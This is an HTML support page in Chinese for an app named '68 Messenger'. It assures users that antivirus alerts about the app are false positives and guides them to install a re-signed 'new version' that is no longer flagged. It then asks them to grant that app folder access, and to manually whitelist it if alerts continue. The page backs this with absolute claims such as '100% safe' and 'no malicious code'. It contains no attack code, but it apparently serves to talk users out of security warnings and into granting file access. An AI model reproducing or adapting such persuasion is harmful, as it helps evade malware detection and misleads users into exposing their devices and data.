<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>安全使用指南 - 报毒解决方案 | 68 Messenger</title>
    <link rel="stylesheet" href="css/virus-solution.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@300;400;500;600;700;900&display=swap" rel="stylesheet">
</head>
<body>
    <!-- 导航栏 -->
    <nav class="navbar">
        <div class="container">
            <a href="index.html" class="nav-brand">
                <div class="logo-icon">
                    <i class="fas fa-comment-dots"></i>
                </div>
                <span class="logo-text">68</span>
            </a>
            <div class="nav-links">
                <a href="#what">什么是报毒</a>
                <a href="#why">为什么报毒</a>
                <a href="#solution">解决方案</a>
                <a href="#faq">常见问题</a>
            </div>
            <div class="nav-actions">
                <a href="index.html" class="btn-back">
                    <i class="fas fa-arrow-left"></i>
                    <span>返回首页</span>
                </a>
            </div>
        </div>
    </nav>

    <!-- Hero Section -->
    <section class="hero" id="hero">
        <div class="hero-bg">
            <div class="gradient-orb orb-1"></div>
            <div class="gradient-orb orb-2"></div>
            <div class="grid-pattern"></div>
        </div>
        <div class="container">
            <div class="hero-content">
                <div class="hero-badge">
                    <i class="fas fa-bolt"></i>
                    <span>快速解决方案</span>
                </div>
                <h1 class="hero-title">
                    APP被报毒？
                    <span class="highlight">别担心，这里有答案</span>
                </h1>
                <p class="hero-subtitle">
                    我们理解您的困扰。报毒并不意味着APP有问题，<br>
                    这里将为您详细解释原因，并提供简单有效的解决方案。
                </p>
                <div class="hero-actions">
                    <a href="#solution" class="btn btn-primary">
                        <i class="fas fa-wrench"></i>
                        立即解决
                    </a>
                    <a href="#what" class="btn btn-secondary">
                        <i class="fas fa-circle-info"></i>
                        了解详情
                    </a>
                </div>
                <div class="hero-stats">
                    <div class="stat-item">
                        <span class="stat-number">100%</span>
                        <span class="stat-label">安全保障</span>
                    </div>
                    <div class="stat-divider"></div>
                    <div class="stat-item">
                        <span class="stat-number">3分钟</span>
                        <span class="stat-label">快速解决</span>
                    </div>
                    <div class="stat-divider"></div>
                    <div class="stat-item">
                        <span class="stat-number">0</span>
                        <span class="stat-label">数据丢失</span>
                    </div>
                </div>
            </div>
            <div class="hero-visual">
                <div class="phone-mockup">
                    <div class="phone-screen">
                        <div class="app-demo">
                            <div class="demo-header">
                                <i class="fas fa-shield-check"></i>
                                <span>安全验证通过</span>
                            </div>
                            <div class="demo-content">
                                <div class="demo-icon success">
                                    <i class="fas fa-check-circle"></i>
                                </div>
                                <p>您的APP运行正常</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="scroll-indicator">
            <span>向下滚动了解更多</span>
            <i class="fas fa-chevron-down"></i>
        </div>
    </section>

    <!-- 什么是报毒 -->
    <section class="section" id="what">
        <div class="container">
            <div class="section-header">
                <span class="section-tag">基础知识</span>
                <h2 class="section-title">什么是"报毒"？</h2>
                <p class="section-desc">简单理解手机安全软件的工作原理</p>
            </div>
            <div class="info-grid">
                <div class="info-card main-card">
                    <div class="card-icon">
                        <i class="fas fa-virus-slash"></i>
                    </div>
                    <h3>报毒 ≠ 有毒</h3>
                    <p>
                        "报毒"是指手机安全软件（如手机管家、杀毒软件）在扫描APP时，
                        <strong>误判</strong>其为潜在风险软件。这就像机场安检有时会对无害物品发出警报一样，
                        是一种<strong>过度保护机制</strong>。
                    </p>
                    <div class="card-highlight">
                        <i class="fas fa-lightbulb"></i>
                        <span>关键点：报毒是安全软件的"误报"，不代表APP真的有问题</span>
                    </div>
                </div>
                <div class="info-card">
                    <div class="card-icon small">
                        <i class="fas fa-shield-virus"></i>
                    </div>
                    <h4>安全软件的工作方式</h4>
                    <p>安全软件通过"特征匹配"来判断APP是否安全，某些正常功能可能触发警报。</p>
                </div>
                <div class="info-card">
                    <div class="card-icon small">
                        <i class="fas fa-exclamation-triangle"></i>
                    </div>
                    <h4>误报很常见</h4>
                    <p>即使是知名APP，也经常遇到被误报的情况，这是行业普遍现象。</p>
                </div>
            </div>
        </div>
    </section>

    <!-- 为什么会报毒 -->
    <section class="section section-dark" id="why">
        <div class="container">
            <div class="section-header">
                <span class="section-tag">深入了解</span>
                <h2 class="section-title">为什么会被报毒？</h2>
                <p class="section-desc">了解报毒的真正原因</p>
            </div>
            <div class="reasons-grid">
                <div class="reason-card">
                    <div class="reason-number">01</div>
                    <div class="reason-icon">
                        <i class="fas fa-code"></i>
                    </div>
                    <h4>代码特征相似</h4>
                    <p>我们APP使用的某些技术代码，与安全软件数据库中的"特征码"相似，导致被误判。</p>
                </div>
                <div class="reason-card">
                    <div class="reason-number">02</div>
                    <div class="reason-icon">
                        <i class="fas fa-certificate"></i>
                    </div>
                    <h4>签名证书问题</h4>
                    <p>APP的数字签名不在某些安全软件的"白名单"中，被标记为未知来源。</p>
                </div>
                <div class="reason-card">
                    <div class="reason-number">03</div>
                    <div class="reason-icon">
                        <i class="fas fa-database"></i>
                    </div>
                    <h4>病毒库更新延迟</h4>
                    <p>安全软件的病毒特征库更新后，可能暂时将正常APP误判为风险软件。</p>
                </div>
                <div class="reason-card">
                    <div class="reason-number">04</div>
                    <div class="reason-icon">
                        <i class="fas fa-lock"></i>
                    </div>
                    <h4>权限请求敏感</h4>
                    <p>APP请求的某些权限（如存储、网络）被安全软件视为"敏感行为"。</p>
                </div>
            </div>
        </div>
    </section>

    <!-- 安全声明 -->
    <section class="section" id="safety">
        <div class="container">
            <div class="safety-wrapper">
                <div class="safety-content">
                    <div class="section-header left">
                        <span class="section-tag">安全承诺</span>
                        <h2 class="section-title">我们的APP安全吗？</h2>
                    </div>
                    <div class="safety-text">
                        <p class="lead">
                            <strong>请放心，我们的APP是100%安全的。</strong>
                        </p>
                        <p>
                            我们深知用户对隐私和安全的重视。我们的APP采用端对端加密技术，
                            您的所有数据都存储在本地设备上，服务器不会存储任何用户数据。
                        </p>
                    </div>
                    <div class="safety-features">
                        <div class="feature-item">
                            <i class="fas fa-check-circle"></i>
                            <span>端对端加密保护</span>
                        </div>
                        <div class="feature-item">
                            <i class="fas fa-check-circle"></i>
                            <span>数据仅存本地</span>
                        </div>
                        <div class="feature-item">
                            <i class="fas fa-check-circle"></i>
                            <span>服务器零存储</span>
                        </div>
                        <div class="feature-item">
                            <i class="fas fa-check-circle"></i>
                            <span>无后门、无恶意代码</span>
                        </div>
                    </div>
                </div>
                <div class="safety-visual">
                    <div class="shield-graphic">
                        <div class="shield-outer">
                            <div class="shield-inner">
                                <i class="fas fa-shield-check"></i>
                            </div>
                        </div>
                        <div class="shield-ring ring-1"></div>
                        <div class="shield-ring ring-2"></div>
                        <div class="shield-ring ring-3"></div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- 解决步骤 -->
    <section class="section section-gradient" id="solution">
        <div class="container">
            <div class="section-header">
                <span class="section-tag">操作指南</span>
                <h2 class="section-title">3步解决报毒问题</h2>
                <p class="section-desc">按照以下步骤操作，轻松恢复正常使用</p>
            </div>
            <div class="steps-container">
                <div class="steps-line"></div>
                
                <!-- 步骤1 -->
                <div class="step-item">
                    <div class="step-marker">
                        <span class="step-number">1</span>
                    </div>
                    <div class="step-content">
                        <div class="step-card">
                            <div class="step-header">
                                <i class="fas fa-mobile-screen-button"></i>
                                <h3>保留现有APP</h3>
                            </div>
                            <p class="step-desc">
                                <strong>重要：请不要卸载当前被报毒的APP！</strong><br>
                                您的数据都保存在这个APP中，卸载会导致数据丢失。
                            </p>
                            <div class="step-warning">
                                <i class="fas fa-triangle-exclamation"></i>
                                <span>卸载 = 数据丢失，请务必保留</span>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- 步骤2 -->
                <div class="step-item">
                    <div class="step-marker">
                        <span class="step-number">2</span>
                    </div>
                    <div class="step-content">
                        <div class="step-card">
                            <div class="step-header">
                                <i class="fas fa-download"></i>
                                <h3>下载新版本</h3>
                            </div>
                            <p class="step-desc">
                                点击下方按钮，下载我们提供的新版本APP安装包。
                                新版本已更换签名证书，不会再被报毒。
                            </p>
                            <div class="download-box">
                                <a href="#" class="btn btn-download">
                                    <i class="fas fa-cloud-arrow-down"></i>
                                    <span>
                                        <strong>下载新版本</strong>
                                        <small>v2.5.0 | 45MB</small>
                                    </span>
                                </a>
                                <div class="download-info">
                                    <span><i class="fas fa-shield-check"></i> 安全认证</span>
                                    <span><i class="fas fa-clock"></i> 更新于 2024.01.15</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- 步骤3 -->
                <div class="step-item">
                    <div class="step-marker">
                        <span class="step-number">3</span>
                    </div>
                    <div class="step-content">
                        <div class="step-card large">
                            <div class="step-header">
                                <i class="fas fa-folder-open"></i>
                                <h3>授权数据迁移</h3>
                            </div>
                            <p class="step-desc">
                                安装完成后打开新APP，按照提示完成文件夹授权，
                                即可将旧APP的数据迁移到新APP中。
                            </p>
                            
                            <div class="auth-guide">
                                <h4><i class="fas fa-images"></i> 图片指引</h4>
                                <div class="guide-images">
                                    <div class="guide-image">
                                        <div class="image-placeholder">
                                            <img src="https://images.unsplash.com/photo-1611162617474-5b21e879e113?w=300&h=500&fit=crop" alt="步骤1截图">
                                            <div class="image-overlay">
                                                <span class="image-step">第1步</span>
                                            </div>
                                        </div>
                                        <p>点击"授权文件夹"</p>
                                    </div>
                                    <div class="guide-image">
                                        <div class="image-placeholder">
                                            <img src="https://images.unsplash.com/photo-1512941937669-90a1b58e7e9c?w=300&h=500&fit=crop" alt="步骤2截图">
                                            <div class="image-overlay">
                                                <span class="image-step">第2步</span>
                                            </div>
                                        </div>
                                        <p>选择旧APP数据文件夹</p>
                                    </div>
                                    <div class="guide-image">
                                        <div class="image-placeholder">
                                            <img src="https://images.unsplash.com/photo-1551650975-87deedd944c3?w=300&h=500&fit=crop" alt="步骤3截图">
                                            <div class="image-overlay">
                                                <span class="image-step">第3步</span>
                                            </div>
                                        </div>
                                        <p>确认授权完成迁移</p>
                                    </div>
                                </div>
                            </div>

                            <div class="auth-notes">
                                <h4><i class="fas fa-circle-info"></i> 关于授权的说明</h4>
                                <ul>
                                    <li>
                                        <i class="fas fa-arrow-right"></i>
                                        <span>授权文件夹<strong>只是为了</strong>将旧APP的数据迁移到新APP</span>
                                    </li>
                                    <li>
                                        <i class="fas fa-arrow-right"></i>
                                        <span>不授权则<strong>无法</strong>将旧APP的数据同步过来</span>
                                    </li>
                                    <li>
                                        <i class="fas fa-arrow-right"></i>
                                        <span>数据是<strong>端对端加密</strong>的，服务器不会存储任何数据</span>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- 完成 -->
                <div class="step-item step-done">
                    <div class="step-marker done">
                        <i class="fas fa-check"></i>
                    </div>
                    <div class="step-content">
                        <div class="step-card success">
                            <div class="step-header">
                                <i class="fas fa-party-horn"></i>
                                <h3>大功告成！</h3>
                            </div>
                            <p class="step-desc">
                                恭喜！您已成功解决报毒问题，现在可以正常使用APP了。
                                原来的旧APP可以放心卸载。
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- FAQ -->
    <section class="section" id="faq">
        <div class="container">
            <div class="section-header">
                <span class="section-tag">帮助中心</span>
                <h2 class="section-title">常见问题</h2>
                <p class="section-desc">如果您还有疑问，这里可能有答案</p>
            </div>
            <div class="faq-container">
                <div class="faq-item">
                    <div class="faq-question">
                        <span>报毒后继续使用会有风险吗？</span>
                        <i class="fas fa-chevron-down"></i>
                    </div>
                    <div class="faq-answer">
                        <p>
                            不会有任何风险。报毒只是安全软件的误报，我们的APP不含任何恶意代码。
                            您可以放心使用，但为了更好的体验，建议按照上述步骤更换新版本。
                        </p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>为什么要保留旧APP不能卸载？</span>
                        <i class="fas fa-chevron-down"></i>
                    </div>
                    <div class="faq-answer">
                        <p>
                            因为您的所有数据都存储在旧APP的本地文件夹中。如果卸载旧APP，
                            这些数据将会被删除，且无法恢复（我们的服务器不存储任何用户数据）。
                        </p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>授权文件夹会泄露我的隐私吗？</span>
                        <i class="fas fa-chevron-down"></i>
                    </div>
                    <div class="faq-answer">
                        <p>
                            绝对不会。授权只是让新APP读取旧APP文件夹中的数据，
                            这个过程完全在您的设备本地完成，数据不会上传到任何服务器。
                        </p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>新版本还会被报毒吗？</span>
                        <i class="fas fa-chevron-down"></i>
                    </div>
                    <div class="faq-answer">
                        <p>
                            新版本已更换签名证书并优化了代码结构，在大部分设备上不会再被报毒。
                            如果仍有问题，您可以在安全软件中手动添加信任。
                        </p>
                    </div>
                </div>
                <div class="faq-item">
                    <div class="faq-question">
                        <span>迁移后旧APP可以卸载吗？</span>
                        <i class="fas fa-chevron-down"></i>
                    </div>
                    <div class="faq-answer">
                        <p>
                            可以。当您确认新APP中的数据完整无误后，就可以放心卸载旧APP了。
                            建议在新APP中确认所有数据都已正常显示后再卸载。
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- CTA Section -->
    <section class="section section-cta">
        <div class="container">
            <div class="cta-content">
                <h2>还有问题？联系我们</h2>
                <p>如果以上内容无法解决您的问题，欢迎联系我们的客服团队</p>
                <div class="cta-buttons">
                    <a href="#" class="btn btn-primary">
                        <i class="fas fa-headset"></i>
                        在线客服
                    </a>
                    <a href="index.html" class="btn btn-outline">
                        <i class="fas fa-home"></i>
                        返回首页
                    </a>
                </div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer class="footer">
        <div class="container">
            <div class="footer-content">
                <a href="index.html" class="footer-brand">
                    <i class="fas fa-comment-dots"></i>
                    <span>68 Messenger</span>
                </a>
                <div class="footer-links">
                    <a href="index.html">返回首页</a>
                    <a href="#">隐私政策</a>
                    <a href="#">用户协议</a>
                    <a href="#">帮助中心</a>
                </div>
                <div class="footer-copyright">
                    <p>© 2024 68 Messenger. All rights reserved.</p>
                </div>
            </div>
        </div>
    </footer>

    <script src="js/main.js"></script>
</body>
</html>

